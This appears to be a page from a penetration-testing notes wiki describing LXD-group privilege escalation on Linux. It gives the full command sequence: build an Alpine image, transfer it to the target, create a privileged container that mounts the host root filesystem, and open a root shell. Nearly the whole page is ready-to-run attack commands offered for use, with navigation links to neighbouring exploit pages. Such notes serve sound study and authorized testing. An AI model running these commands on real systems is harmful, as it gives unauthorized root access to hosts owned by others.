LXD - Alpine

Assuming you are already inside, for example as a low priv ssh user

id

.....(lxd)

Try the following:

[1] lxd init

[2]Build the exploit from kali

clone into:

sudo git clone https://github.com/saghul/lxd-alpine-builder.git cd lxd-alpine-builder sudo ./build-alpine

After building you are left with a tar file

Transfer the .tar file to /tmp/target using a python server and either curl/wget

[3]Once the tar file is on /tmp directory on target

lxd init

press enter a bunch of times until you get to the bottom no need to change any configs just accept default

lxc image import alpine.tar.gz --alias alpine

lxc init alpine privesc -c security.privileged=true

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

lxc exec privesc /bin/sh

#root

PreviousLinux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)NextServ-U FTP Server < 15.1.7

Last updated